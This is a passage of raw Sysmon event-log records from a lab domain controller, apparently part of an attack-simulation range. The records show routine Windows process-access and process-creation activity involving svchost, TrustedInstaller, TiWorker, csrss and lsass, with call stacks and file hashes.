10341000x80000000000000001504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:51.002{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.987{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.971{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.799{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.799{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.799{266CAFBE-6472-6064-2400-00000000AE01}2972C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe10.0.14393.4222 (rs1_release.210113-1739)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=1571A4132449A317F66DF783E9468783,SHA256=5CFF48937FAE7F0CF5935248959141E2A60E88FE8105C43676B866FDAC36ADD2,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.768{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.705{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646A-6064-0A00-00000000AE01}840928C:\Windows\system32\services.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.698{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 